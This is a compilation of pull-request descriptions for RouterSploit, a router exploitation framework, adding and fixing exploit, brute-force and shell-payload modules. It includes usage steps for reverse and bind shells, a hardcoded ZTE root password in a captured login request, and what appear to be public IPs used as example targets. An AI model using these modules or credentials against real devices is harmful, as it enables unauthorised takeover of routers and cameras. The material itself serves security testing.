threat9/routersploit

routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
routersploit/modules/exploits/comtrend_CT_5351T/comtrend_CT_5361T_password_disclosure.py

same as asmax/ar_1004g_password_disclosure but with b64decode
full details:
https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html

Comtrend CT 5361T Password Disclosure vulnerability

---

routersploit/modules/exploits/linksys/1500_2500.py
routersploit/modules/exploits/linksys/1500_2500_rce.py

Added a new module.  This has been tested successfully on my personal E2500.

Added Module for Linksys E1500/2500.

---

routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py

some adjustments to keep up with @llazzaro changes.
however, i ignored PEP8 E501 (lines should be <79), since this is more readable, not to mention that limiting a line to 79 chars makes no sense.

PEP8tify code to match the project code style

---

routersploit/modules/creds/http_form_bruteforce.py
routersploit/modules/creds/http_form_default.py

Cisco Docsis has two different urls:
- `GET /Docsis_system.asp` (login form is here)
- `POST /goform/Docsis_system` (actual login entrypoint)
Right now routersploit expects that the same URL could serve `GET` as well as `POST` requests.
You can leave it `same` as `path` value.
All you need is specify `form_path`, `path` option will be set from `<form action="VALUE">` attribute.
Cisco Docsis uses `username_login` and `password_login` as input names, so I have added them to default list.
[![asciicast](https://asciinema.org/a/d92znqtma32v37gs3h7d0vst9.png)](https://asciinema.org/a/d92znqtma32v37gs3h7d0vst9)

Adapt creds/http_form_* modules to Cisco Docsis

---

routersploit/modules/exploits/multi/misfortune_cookie.py

Hi,
I have been working on this more than a month and now decided to add it here.
The framework is great good job.we can work on this to add more vulnerable models/firmwares in the future.
The main exploit i wrote is [here](https://gist.github.com/doorbash/f454c698f192a0e5d1bf4da9c6869b67)

Misfortune Cookie Authentication Bypass

---

rsf.py

In some distributions, e.g. archlinux,
'python' symlinked to python3, which throws InvalidSyntax

s/env python/env python2/

---

routersploit/modules/exploits/zte/f660_config_disclosure.py
routersploit/modules/exploits/zte/f6xx_default_root.py

* Add exploits ZTE F660 Config Disclosure
* Add exploits ZTE F6XX Default root password
Example:
```
use exploits/zte/f660_config_disclosure
set target 36.79.119.10
exploit
```
```
use exploits/zte/f6xx_default_root
set target 36.74.22.122
exploit
```

Add exploits ZTE F660 Config Disclosure & ZTE F6XX Default root password

---

routersploit/modules/exploits/huawei/hg630a_default_creds.py

Fix hg630a_default_creds fails when NoValidConnectionsError

Fix hg630a if paramiko ssh trows no valid connections

---

routersploit/modules/exploits/netcore/udp_53413_rce.py

Please fix the seebug uri -> https://www.seebug.org/vuldb/ssvid-90227

fix netcore udp 53413 backdoor - url reference

---

routersploit/wordlists/defaults.txt
routersploit/wordlists/passwords.txt

Reference:
* https://www.pentestpartners.com/blog/vulnerable-wi-fi-dildo-camera-endoscope-yes-really/

Svakom Siime Eye hardcoded root password

---

routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py

Small fix: exploit now uses print_info instead of print. Also put imports into alphabetical order.

Change print to built-in print_info

---

routersploit/wordlists/defaults.txt
routersploit/wordlists/passwords.txt

Hello,
I've added 2 of the default passwords for zhone DSL modem/routers. 
Test:
```
$ python rsf.py
______            _            _____       _       _ _
| ___ \          | |          /  ___|     | |     (_) |
| |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
|    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
| |
Router Exploitation Framework   |_|
Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Bad Blood
Version  : 2.2.1
Exploits: 117 Scanners: 29 Creds: 13
rsf > use creds/http_basic_default
rsf (HTTP Basic Default Creds) > set
defaults         path             port             stop_on_success  target           threads          verbosity …
```

adding default user/password for zhone DSL modems

---

README.md

The mistake was just that for executing: pip install -r requirements.txt
you needed sudo powers, because when you tried to access some python directories, an exception was thrown: OSError: [Errno 13] Permission denied: '/usr/local/lib/python2.7/dist-packages/ply'
So the solution for this was just adding 'sudo':
sudo pip install -r requirements.txt

updated installation for Ubuntu 16.04

---

.dockerignore
Dockerfile
Makefile
run_docker.sh

- Add base layer with installing requirements to shorten build time.
- Add .dockerignore to reduce amount of files to copy.
- Remove unnecessary `run_docker.sh` script.

Refactor Dockerfile.

---

routersploit/test/test_interpreter.py

This adds a unit test for the parse_line method in routersploit's BaseInterpreter class.

Add unit test for Interpreter parse_line method

---

routersploit/modules/exploits/routers/multi/rom0.py

The HTTP HEAD method in general doesn't return the content of the body, unless it is a redirection page, so line `and len(response.text) > 500:` "in general" will never be true if second line of check `response = http_request(method="HEAD", url=url)` get response.
As result, devices seem no vulnerable when actually it is.
Data:
```
HEAD /rom-0 HTTP/1.1
Host: 192.168.254.254
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Sat, 01 Jan 2000 00:18:54 GMT
Last-Modified: Wed, 01 Jan 1930 00:18:54 GMT
Content-Length: 16384
Server: RomPager/4.07 UPnP/1.0
EXT:
```
My suggestion is just to check whether content type doesn't return "text/html" as value, so it correct this issue and keep …

Rom-0 exploit - check error

---

routersploit/modules/exploits/routers/zte/zxv10_rce.py

ZXHN H108N V2.5 detected as vulnerable to module 'ZTE ZXV10 RCE' when actually it is not.
DATA:
```
---request begin---
POST /login.gch HTTP/1.1
Host: notvulnerable.dev
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 52
Content-Type: application/x-www-form-urlencoded
Frm_Logintoken=&Username=root&Password=W%21n0%26oO7.
---request end---
---response begin---
HTTP/1.1 404 Not Found
Server: Mini web server 1.0 ZTE corp 2005.
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: no-cache,no-store
<HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H2>404 Not Found</H2>
The requested URL was not found on this …
```

ZXHN H108N V2.5, module 'ZTE ZXV10 RCE': Fixed false positive issue #305

---

routersploit/utils/__init__.py

This PR is a simple solution about #352, and make print_table support texts warp with kwargs `max_column_length `.

Make print_table auto warp texts

---

routersploit/exploits.py
routersploit/interpreter.py
tests/test_exploits.py
tests/test_interpreter.py

Introduce `Exploit.validate_setup` method in order to check whether Exploit's setup is correct. In most case scenarios we will check if `Exploit.target` is not `None`. When exploit need custom validation logic please overwrite `validate_setup`.
Resolves #357

Validate exploit's setup before `run` and `check` commands

---

docs/modules/generic/upnp/ssdp_msearch.md
routersploit/modules/generic/upnp/ssdp_msearch.py

**READY**
This PR adds SSDP MSEARCH module that sends M-SEARCH request to the target and retrieve information from UPnP enabled systems.
2. Do: `use generic/upnp/ssdp_msearch`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If target supports UPnP information are retrieved.

Adding SSDP MSEARCH module

---

docs/modules/exploits/routers/multi/tcp_32764_info_disclosure.md
docs/modules/exploits/routers/multi/tcp_32764_rce.md
routersploit/modules/exploits/routers/multi/tcp_32764_info_disclosure.py
routersploit/modules/exploits/routers/multi/tcp_32764_rce.py
tests/conftest.py
tests/exploits/routers/multi/test_tcp_32764_info_disclosure.py
tests/exploits/routers/multi/test_tcp_32764_rce.py

**READY**
This PR fixes tcp_32764_rce and tcp_32764_info_disclosure modules. Also docs and tests are added.
2. `use exploits/routers/dlink/dsl_2750b_rce`
4. `run`

Fixing TCP-32764 modules, adding tests and docs

---

docs/modules/payloads/cmd/python_bind_udp.md
docs/modules/payloads/python/bind_udp.md
routersploit/modules/payloads/cmd/python_bind_udp.py
routersploit/modules/payloads/python/bind_udp.py
tests/payloads/cmd/test_python_bind_udp.py
tests/payloads/python/test_bind_udp.py

**READY**
This PR adds Python UDP bind shell payload and Python UDP bind shell one-liner
Python UDP Bind Shell:
2. Do: `use payloads/python/bind_udp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates python udp bind shell payload
Python UDP Bind Shell One-Liner:
2. Do: `use payloads/cmd/python_bind_udp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates python udp bind shell one-liner payload

Adding Python UDP Bind Shell

---

docs/modules/payloads/cmd/python_reverse_udp.md
docs/modules/payloads/python/reverse_udp.md
routersploit/modules/payloads/cmd/python_reverse_udp.py
routersploit/modules/payloads/python/reverse_udp.py
tests/payloads/cmd/test_python_reverse_udp.py
tests/payloads/python/test_reverse_udp.py

**READY**
This PR adds Python UDP reverse shell payload and Python UDP reverse shell one-liner
Python UDP Reverse Shell:
2. Do: `use payloads/python/reverse_udp`
3. Do: `set lhost 192.168.1.4`
3. Do: `set lport 4321`
4. Do: `run`
5. Module generates python udp reverse shell payload
Python UDP Reverse Shell One-Liner:
2. Do: `use payloads/cmd/python_reverse_udp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. Module generates python udp reverse shell payload

Adding Python UDP Reverse Shell payloads

---

docs/modules/payloads/cmd/php_bind_tcp.md
docs/modules/payloads/php/bind_tcp.md
routersploit/modules/payloads/cmd/php_bind_tcp.py
routersploit/modules/payloads/php/bind_tcp.py
tests/payloads/cmd/test_php_bind_tcp.py
tests/payloads/php/test_bind_tcp.py

**READY**
This PR adds PHP TCP bind shell payload and PHP TCP bind shell one-liner
PHP TCP Bind Shell:
2. Do: `use payloads/php/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates php tcp bind shell payload
PHP TCP Bind Shell One-Liner:
2. Do: `use payloads/cmd/php_bind_tcp`
4. Do: `set rport 4321`
5. Do: `run`
6. Module generates php tcp bind shell payload

Adding PHP Bind TCP payloads

---

docs/modules/payloads/cmd/awk_bind_udp.md
routersploit/modules/payloads/cmd/awk_bind_udp.py
tests/payloads/cmd/test_awk_bind_udp.py

**READY**
This PR adds AWK UDP Bind Shell. Module generates payload that creates interactive udp bind shell by using awk.
2. Do: `use payloads/cmd/awk_bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates awk udp bind shell payload

AWK UDP Bind Shell Payload

---

routersploit/modules/exploits/routers/zte/zxv10_rce.py

Refixed issue after code reorganization
**READY**
Fixes again #305 after code was reorganized and the pull request #346's code that fixed it was deleted
2. `use exploits/routers/zte/zxv10_rce`
3. `set target 192.168.0.1`
4. `run`
If the ZTE router returns a 404 status code and the exploit does not succeed, the message will be "Exploit failed" as it should be and not "Succesful authorization"
_Does not apply_

Fixed false positive issue #305 in version 3.1.0

---

MANIFEST.in
setup.py

Previously, when installing routersploit, rsf.py was not provided and several Python code and package files in routersploit/resources/ subdirectories were not installed.
This was noticed while working on wip/routersploit package on pkgsrc.
With the following commits routersploit is now completely self-contained,
provides the rsf.py script and all resource files making the packaging of it for
package systems trivial.
**READY**
Install rsf.py script and resources files as part of setup.py.

setup.py improvements and routersploit/resources/ installation via MANIFEST.in

---

routersploit/core/ftp/ftp_client.py
routersploit/core/snmp/snmp_client.py
routersploit/core/ssh/ssh_client.py
routersploit/core/tcp/tcp_client.py
routersploit/core/telnet/telnet_client.py
routersploit/core/udp/udp_client.py
routersploit/modules/creds/generic/ftp_bruteforce.py
routersploit/modules/creds/generic/ftp_default.py
routersploit/modules/creds/generic/snmp_bruteforce.py
routersploit/modules/creds/generic/ssh_bruteforce.py
routersploit/modules/creds/generic/ssh_default.py
routersploit/modules/creds/generic/telnet_bruteforce.py
routersploit/modules/creds/generic/telnet_default.py
routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py
routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor.py
routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli.py
routersploit/modules/exploits/generic/heartbleed.py
routersploit/modules/exploits/generic/ssh_auth_keys.py
routersploit/modules/exploits/routers/cisco/ucm_info_disclosure.py
routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
routersploit/modules/exploits/routers/huawei/hg520_info_disclosure.py
routersploit/modules/exploits/routers/mikrotik/routeros_jailbreak.py
routersploit/modules/exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure.py
routersploit/modules/exploits/routers/multi/tcp_32764_info_disclosure.py
routersploit/modules/exploits/routers/multi/tcp_32764_rce.py
routersploit/modules/exploits/routers/netcore/udp_53413_rce.py
routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py
routersploit/modules/exploits/routers/thomson/twg849_info_disclosure.py
routersploit/modules/generic/upnp/ssdp_msearch.py

**READY**
This PR creates unified api for interacting with ftp/ssh/telnet/snmp daemons.
FTP
2. `use creds/generic/ftp_default`
4. `run`
5. `use creds/generic/ftp_bruteforce`
6. `set target 192.168.1.1`
7. `run`
SSH
2. `use creds/generic/ssh_default`
4. `run`
5. `use creds/generic/ssh_bruteforce`
6. `set target 192.168.1.1`
7. `run`
Telnet
2. `use creds/generic/telnet_default`
4. `run`
5. `use creds/generic/telnet_bruteforce`
6. `set target 192.168.1.1`
7. `run`
SNMP
2. `use creds/generic/snmp_bruteforce`
4. `run`

Unifying ftp/ssh/telnet/snmp communication

---

docs/modules/exploits/routers/asus/asuswrt_lan_rce.md
routersploit/modules/exploits/routers/asus/asuswrt_lan_rce.py
tests/exploits/routers/asus/test_asuswrt_lan_rce.py

**READY**
This PRT adds AsusWRT Lan RCE exploit. 
2. Do: `use exploits/routers/asus/asuswrt_lan_rce`
3. Do: `set target[TargetIP]`
4. Do: `run`
5. If router is vulnerable, it should be possible to execute commands on operating system level.
6. Do: `set payload reverse_tcp`
7. Do: `set lhost [AttackerIP]`
8. Do: `run`

AsusWRT Lan RCE

---

docs/modules/exploits/routers/asus/infosvr_backdoor_rce.md
routersploit/modules/exploits/routers/asus/infosvr_backdoor_rce.py

**READY**
This PR fixes InfoSVR Backdoor RCE module
2. Do: `use exploits/routers/asus/infosvr_backdoor_rce`
3. Do: `set target[TargetIP]
4. Do: `run`
5. If router is vulnerable, it should be possible to execute commands on operating system level.
6. Do: `set payload reverse_tcp`
7. Do: `set lhost [AttackerIP]`
8. Do: `run`

Fixing InfoSVR Backdoor RCE module

---

routersploit/modules/exploits/routers/3com/officeconnect_rce.py

**READY**
This PR fixes 3Com OfficeConnect RCE false positive. It resolves #503 and #493 
2. `use exploits/routers/3com/officeconnect_rce`
4. `run`

Fixing false positive - 3com officeconnect rce

---

requirements-dev.txt
requirements.txt

**READY**
This PR sets pysnmp requirement to version 4.4.6. Resolves #516 
1. Do `./
2. Start `./rsf.py`
3. `use scanner/autopwn`
4. `set target 192.168.1.1`
5. `run`

Requirements - Setting pysnmp version

---

tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py

**READY**
This PR adds tests for D-Link DCS930L Auth RCE module.
1. Execute `pytest tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py`

Adding tests for D-Link DCS930L Auth RCE module

---

tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py

**READY**
This PR adds tests for D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change module.
1. Execute `tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py`

Adding tests for D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change

---

docs/modules/exploits/routers/ipfire/ipfire_proxy_rce.md
routersploit/modules/exploits/routers/ipfire/ipfire_proxy_rce.py
tests/exploits/routers/ipfire/test_ipfire_proxy_rce.py

**READY**
This PR fixes  IPFire Proxy RCE module, adds tests and docs.
2. Do: `use exploits/routers/ipfire/ipfire_proxy_rce`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. Do: `set payload awk_reverse_tcp`
6. Do: `set lhost [AttackerIP]`
7. Do: `run`

Fixing IPFire Proxy RCE module, adding tests and docs

---

docs/modules/exploits/routers/ipfire/ipfire_shellshock.md
routersploit/modules/exploits/routers/ipfire/ipfire_shellshock.py
tests/exploits/routers/ipfire/test_ipfire_shellshock.py

**READY**
This PR fixes IPFire Shellshock module, adds tests and docs
2. Do: `use exploits/routers/ipfire/ipfire_shellshock`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If router is vulnerable, it should be possible to execute commands on operating system level.
6. Do: `set payload awk_reverse_tcp`
7. Do: `set lhost [AttackerIP]`
8. Do: `run`

Fixing IPFire Shellshock module, adding tests and docs

---

routersploit/interpreter.py

**READY**
Related to issue [Using routersploit in scripts](https://github.com/threat9/routersploit/issues/555)
This allows routersploit to be used in scripts by offering a `-x` flag for "execute command",  `-m` or `--module` for setting the module, and `-s` or `--set` to set options.
1. `python ./rsf.py`
2. `exit`
1. `python ./rsf.py -x -m "scanners/autopwn" -s "target 10.0.0.1"`
Because I didn't write a module, and there didn't appear to be pre-existing documentation on general usage (please let me know if there is), I wasn't sure where to put documentation for this but I'd be happy to write it. I wasn't really sure how to test it either but open to guidance, I just don't have that much of a python background with CLI stuff.

support noninteractive mode

---

README.md

Ready
If followed exactly on a clean Ubuntu installation, the current master branch's installation instructions do not work. Running the command which installs dependencies from `requirements.txt` reports that `setuptools` is not installed. Installing `setuptools` manually fixes the issue, so I added it to the Ubuntu instructions. I haven't tested this on any other distro, so only the Ubuntu instructions were modified.
1. Get a clean Ubuntu installation (Use a VM or something)
2. Clone the current master branch and follow the instructions in its `README.md` exactly; observe the error
3. Clone this fork and follow the instructions in its `README.md` exactly; observe the error's absence
- [✓] Added one line to `README.md`

Fix setup instructions to work on a clean Ubuntu installation

---

.travis/install.sh
requirements-dev.txt
routersploit/core/bluetooth/btle/btle_device.py
routersploit/core/exploit/shell.py
routersploit/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py

**READY**
Fixes errors with lint:
```
+make lint tests
python3 -m flake8 --exclude=.git,rsf.py --ignore=E501,F405,F403,W504 .
./routersploit/core/bluetooth/btle/btle_device.py:33:12: F632 use ==/!= to compare str, bytes, and int literals
./routersploit/core/exploit/shell.py:41:16: F632 use ==/!= to compare str, bytes, and int literals
./routersploit/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py:78:12: F632 use ==/!= to compare str, bytes, and int literals
```
1. Run `make lint`

Fixing lint errors

---

routersploit/core/exploit/payloads.py
routersploit/core/exploit/shell.py
routersploit/core/exploit/utils.py
routersploit/modules/exploits/generic/ssh_auth_keys.py
routersploit/modules/scanners/autopwn.py

**READY**
1. Install routersploit, e.g. via pkgsrc wip/routersploit
2. Start `./rsf.py`
3. `use scanners/autopwn`
4. `set target 192.168.1.1`
5. `run`
...then watch threads ~suddendly terminating without invoking any module:
````
[...]
[*] Running module...
-
[*] Starting vulnerablity check...
[*] thread-0 thread is starting...
[*] thread-1 thread is starting...
[...]
[*] thread-0 thread is terminated.
[*] thread-1 thread is terminated.
[...]
-
[*] Elapsed time: 0.0001952648162841797 seconds
-
[*] Starting default credentials check...
[*] thread-0 thread is starting...
[*] thread-1 thread is starting...
[...] …
```

Avoid hardcoded relative paths

---

docs/modules/exploits/cameras/jovision/jovision_credentials_disclosure.md
routersploit/modules/exploits/cameras/jovision/jovision_credentials_disclosure.py
tests/exploits/cameras/jovision/test_jovision_camera_credential_disclosure.py

**READY**
This PR adds a credential disclosure exploit for some jovision IP camera models.
2. `use exploits/cameras/jovision/jovision_credentials_disclosure`
4. `run`

Add credential disclosure exploit for some jovision cameras

---

routersploit/core/exploit/shell.py

**READY**
This PR fixes #584 bug. The bug boils down to:
```
>>> "payloads.armle.bind_tcp".lstrip("payloads")
'.armle.bind_tcp'
>>> "payloads.armle.bind_tcp".lstrip("payloads.")
'rmle.bind_tcp'
```
2. `use exploits/cameras/mvpower/dvr_jaws_rce`
4. `run`

Fixing payload import

---

docs/modules/exploits/routers/zte/zxhn_h108n_wifi_password_disclosure.md
routersploit/modules/exploits/routers/zte/zxhn_h108n_wifi_password_disclosure.py
tests/exploits/routers/zte/test_zxhn_h108n_wifi_password_disclosure.py

**READY**
This PR adds ZTE ZXHN H108N Wifi Password Disclosure module. It resolves #588 
2. Do: `use exploits/routers/zte/zxhn_h108n_wifi_password_disclosure`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If device is vulnerable ssid and wifi password is retrieved.

Adding ZTE ZXHN H108N Wifi Password Disclosure module

---

requirements-dev.txt
requirements.txt
routersploit/modules/creds/cameras/acti/webinterface_http_form_default_creds.py
routersploit/modules/creds/cameras/basler/webinterface_http_form_default_creds.py
routersploit/modules/creds/generic/ftp_default.py
routersploit/modules/creds/generic/http_basic_digest_default.py
routersploit/modules/creds/generic/ssh_default.py
routersploit/modules/creds/generic/telnet_default.py
routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py
routersploit/modules/creds/routers/pfsense/webinterface_http_form_default_creds.py

**READY**
This PR fixes wordlist creds parsing. Resolves #601 and #604 
2. `use creds/generic/ssh_default`
4. `run`

Fixing wordlist creds parsing

---

routersploit/core/exploit/exploit.py

Fixes compatibility with Python 3.8.
**READY**
Changing a dict while iterating over it was an undefined behavior and is now forbidden in new Python. Running routersploit will fail with the error in #623. This simple change fixes this.

Do not update the same dict while iterating (fixes #623)

---

routersploit/modules/exploits/routers/multi/rom0.py

**READY**
There is a chance that the exploits/routers/multi/rom0 module's check function will result in a false positive. In the check function, it downloads the rom-0 file from the router, then checks to see if `<html>` is in the response content. This does not account for the possibility that the html tag has other attributes attached to it. I encounter this false positive on a Arris router model number TG1682G. This router returns the login html page when you request `http://192.168.1.1/rom0`. This login page's html tag looks like this:
```
...
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...
</html>
```
Since the module was looking for just `<html>`, it would false positve and say the router was vulnerable. 
The false positive shows itself in a weird way.  The …

Fix potential FP in rom-0 exploit

---

routersploit/core/exploit/exploit.py

READY
Fixes #711 by using `is_alive` which is present in both Python 2.7 and Python 3

Use is_alive in favour of isAlive for Python 3.9 compatibility.

---

routersploit/modules/exploits/routers/zte/f460_f660_backdoor.py

There is a small typo in routersploit/modules/exploits/routers/zte/f460_f660_backdoor.py.
Should read `vulnerability` rather than `vulnerabilty`.
Semi-automated pull request generated by
https://github.com/timgates42/meticulous/blob/master/docs/NOTE.md

docs: fix simple typo, vulnerabilty -> vulnerability

---

routersploit/resources/wordlists/defaults.txt

**READY**
Add Aztech Globe DSL5068EN-1T1R default telnet creds. Reference https://kbeflo.github.io/2018/12/20/Aztech-Globe-DSL5068EN-1T1R-WiFi-Password-using-Telnet

Add Aztech Globe DSL5068EN-1T1R default telnet creds

---

routersploit/modules/creds/routers/zyxel/ftp_default_creds.py
routersploit/modules/creds/routers/zyxel/ssh_default_creds.py
routersploit/modules/creds/routers/zyxel/telnet_default_creds.py
routersploit/resources/wordlists/defaults.txt
routersploit/resources/wordlists/passwords.txt
tests/creds/routers/zyxel/test_ftp_default_creds.py
tests/creds/routers/zyxel/test_ssh_default_creds.py
tests/creds/routers/zyxel/test_telnet_default_creds.py

READY
Added another default variant I have observed on Zyxel routers
2. `use scanners/routers/router
3. `set target 192.168.X.1`
4. `run`
5. ...

Added another Zyxel default variant

---

routersploit/libs/apiros/apiros_client.py
routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py

READY
I have updated target_function within api_ros_default_creds.py in that I have replaced tcp_sock with tcp_client as it was returning a boolean value instead of tcp_client object because of which exception in Issue request ($766) happened. On fixing this there was another issue at library apiros_client.py where readstr function was checking for an empty string however the sk.recv method was returning None instead so added a check for None value.
2. ` use creds/routers/mikrotik/api_ros_default_creds`
4. `run`

Resolved issue with exploit (#766)

---

routersploit/modules/exploits/routers/linksys/eseries_themoon_rce.py
tests/exploits/routers/linksys/test_eseries_themoon_rce.py

**READY**
Fixes in accordance with the [vulnerability write-up](https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Summary+What+we+know+so+far/17633/), a false-positive check against a Zyxel C3000Z router (and likely other routers).
The Zyxel C3000Z responds as follows to the exploit URI:
```
$ curl http://192.168.0.1/tmUnblock.cgi
<html>
<head>
<script type="text/javascript">
top.location='login.html';
</script>
</head>
</html>
```
The [Linksys Worm "TheMoon" Summary: What we know so far](https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Summary+What+we+know+so+far/17633/) writeup describes checking for potentially vulnerable hosts like so:
```
echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | nc routerip 8080
```
Again, the Zyxel C3000Z responds as follows to the `/HNAP1/` …

Fix exploit check for routers/linksys/test_eseries_themoon_rce.

---

routersploit/modules/exploits/routers/tplink/archer_c9_admin_password_reset.py

This module exploits password reset feature on some TP-Link Archer
routers by leveraging a predictable random number generator seed.
For more details, see this write-up:
https://devcraft.io/posts/2017/07/21/tp-link-archer-c9-admin-password-reset.html
Based on PoC by William Bowling.
READY
2. `use exploits/routers/tplink/archer_c9_admin_password_reset`
3. `set target 192.168.0.1`
4. `run`
5. admin's password should be reset to 'admin'

Add a password reset module for TP-Link Archer routers (CVE-2017-11519)

---

routersploit/modules/exploits/routers/linksys/eseries_themoon_rce.py

**READY
Better detection of vulnerable router in the exploit routers/linksys/eseries_themoon_rce
The exploit checks whether the returned response code is 200,301 or 302 but some webpages uses custom 404 which makes them look as 200 OK so the exploit assumes the  machine is vulnerable but it is not.
2. `use exploits/routers/linksys/eseries_themoon_rce`
4. `check`
##Note
My router wasn't vulnerable to it but it returned as vulnnerable even `autopwn` also returned vulnerable

Fix  better detection of vulnerable router for linksys/eseries_themoon_rce exploit

---

routersploit/modules/exploits/routers/linksys/smartwifi_password_disclosure.py

…files, as used by EA6900 version 1.1.42.161129
ready
Linksys EA6900 router version 1.1.42.161129 is vulnerable to this attack, but delivers .htaccess files in a format not expected by this module.
2. `use exploits/routers/linksys/smartwifi_password_disclosure`
4. `run`
5. ...
- [ x] Write module/feature 
- did not write specific new tests
- did not write specific new docs

Update Linksys password disclosure to support base64 encoded .htaccess

---

routersploit/modules/exploits/routers/netgear/rax30_rce.py

**READY**
Adds exploit targeting Netgear RAX30 RCE
2. `use exploits/routers/netgear/rax30_rce`
4. `run`
5. ...

Add exploit Netgear RAX30

---

routersploit/interpreter.py

**READY**
Fixes/prevents a 'TypeError: argument of type 'NoneType' is not iterable' error.
I defaulted to returning False when the initial return failed.
```
Traceback (most recent call last):
File "C:\Users\***\source\routersploit\rsf.py", line 29, in <module>
routersploit(sys.argv)
File "C:\Users\***\source\routersploit\rsf.py", line 21, in routersploit
rsf = RoutersploitInterpreter()
^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\***\source\routersploit\routersploit\interpreter.py", line 214, in __init__
super(RoutersploitInterpreter, self).__init__()
File "C:\Users\***\source\routersploit\routersploit\interpreter.py", line 54, in __init__
self.setup()
File "C:\Users\***\source\routersploit\routersploit\interpreter.py", line 78, in setup
if is_libedit():
^^^^^^^^^^^^
File …
```

Fix non iterable

---

docs/modules/exploits/misc/watchguard/xcs_9_rce.md
routersploit/modules/exploits/misc/watchguard/xcs_9_rce.py

2. Do: `use exploits/misc/watchguard/xcs_9_rce`
3. Do: `set target[TargetIP]`
4. Do: `run`
5. If router is vulnerable, it should be possible to execute commands on operating system level.
6. Do: `set payload reverse_tcp`
7. Do: `set lhost [AttackerIP]`
8. Do: `run`

Watchguard XCS 9.2

---

routersploit/interpreter.py

**READY**
Ctrl+C will now display an info level message "Use Ctrl+D to exit". If the user has a module running, Ctrl+C will stop the running module.
Ctrl+D will now be the way to exit.
2. `use scanners/autopwn`
4. `run`
5. Press Ctrl+C -> won't kill the process (press Ctrl+C twice to stop the running module)
6. Press Ctrl+D -> kills the process

Set up Ctrl+C signal handler to only exit currently running module

---

README.md
requirements-dev.txt
requirements.txt
routersploit/core/exploit/exploit.py
routersploit/core/exploit/payloads.py
routersploit/core/exploit/printer.py
routersploit/interpreter.py
rsf.py
setup.py

**READY**
Python version 2 is now EOL for 11 years, so it should be safe to drop support for it. As python-future is not compatible with python 3.13 it is also desirable to actively patch it out.

Drop the dependency on python-future
